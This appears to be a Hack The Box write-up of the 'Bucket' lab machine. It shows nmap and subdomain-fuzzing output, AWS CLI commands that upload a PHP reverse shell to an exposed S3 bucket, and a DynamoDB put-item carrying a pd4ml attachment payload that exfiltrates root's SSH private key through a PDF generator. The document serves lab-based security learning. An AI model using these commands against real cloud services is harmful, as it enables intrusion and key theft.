Hackthebox Bucket WriteUp

Overview:

Bucket is a fun linux machine exploiting aws bucker server. After fuzz subdomain there is a bucket server running. Use aws CLI commands to find a endpoint and use put-item to upload a reverse shell. PriEsc is also to exploit aws bucket. but its abit hard to do. After forawrd a port, We could create a table and take advantage of put item about root’s id_rsa key then save it to a default directory. This box it’s awesome to learn some aws CLI stuff. With all that being said, Let’s just jump in!

Reconnaissance:

┌──(kali㉿kali)-[~/htb/boxes/bucket]
└─$ nmap -sC -sV -oN sc 10.10.10.212 -v -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 18:57 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:57
Completed NSE at 18:57, 0.00s elapsed
Initiating NSE at 18:57
Completed NSE at 18:57, 0.00s elapsed
Initiating NSE at 18:57
Completed NSE at 18:57, 0.00s elapsed
Initiating Connect Scan at 18:57
Scanning bucket.htb (10.10.10.212) [1000 ports]
Discovered open port 80/tcp on 10.10.10.212
Discovered open port 22/tcp on 10.10.10.212
Completed Connect Scan at 18:58, 10.82s elapsed (1000 total ports)
Initiating Service scan at 18:58
Scanning 2 services on bucket.htb (10.10.10.212)
Completed Service scan at 18:58, 6.45s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.212.
Initiating NSE at 18:58
Completed NSE at 18:58, 5.28s elapsed
Initiating NSE at 18:58
Completed NSE at 18:58, 0.83s elapsed
Initiating NSE at 18:58
Completed NSE at 18:58, 0.00s elapsed
Nmap scan report for bucket.htb (10.10.10.212)
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The Foothold:

Head over to http://bucket.htb/ and below web page.

Poking around not find anything, So let’s fuzz sub-domains.

┌──(kali㉿kali)-[~/htb/boxes/bucket]
└─$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://10.10.10.212' -H "Host:FUZZ.bucket.htb" --hw 26
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.212/
Total requests: 4989
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                 
=====================================================================
000000247:   404        0 L      2 W        21 Ch       "s3"
┌──(kali㉿kali)-[~/htb/boxes/atom]
└─$ curl http://s3.bucket.htb/
{"status": "running"}

Cool, So this about aws bucket, below are resources about exploit aws bucket and aws CLI commands line.

Penetration Testing Amazon Web Services (AWS) - Rhino Security Labs

Environment variables to configure the AWS CLI

s3api - AWS CLI 1.19.55 Command Reference

AWS CLI Command Reference - AWS CLI 1.19.55 Command Reference

dynamodb - AWS CLI 1.19.55 Command Reference

Setting up aws on our attacker machine.

pip install awscli 
aws configure  
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE 
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY 
Default region name [None]: us-west-2 
Default output format [None]: json

Find tables and endpoints etc.

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb
aws s3api list-buckets --endpoint-url http://s3.bucket.htb

ws s3api put-object --endpoint-url http://s3.bucket.htb/ --bucket adserver --key dir-1/rev.php --body /home/kali/htb/boxes/bucket/rev.php

upload a php reverse shell (https://github.com/pentestmonkey/php-reverse-shell) to the server by put-object command.

check http://s3.bucket.htb/adserver/dir-1/rev.php bucket and we uploaded a reverse shell on the server.

Execute it on the http://bucket.htb/dir-1/rev.php to get a shell.

And we can use password found on the bucket to get to user roy

PriEsc to root:

There a port 8000 running, So, let’s do a local port forward and check what it has .

It’s also a aws bucke.

Exploit AWS pdf generator:

aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb

we create a table and put a root id_rsa key in it, (do these on attacker machine). It will create a pdf file on the server.

aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb

After created it, Pull the pdf file to a default directory /var/www/bucket-app/files.

curl -X POST -d “action=get_alerts” http://127.0.0.1:8000/ -v

Check the pdf result file and we got a root id_rsa key.

logged in as root!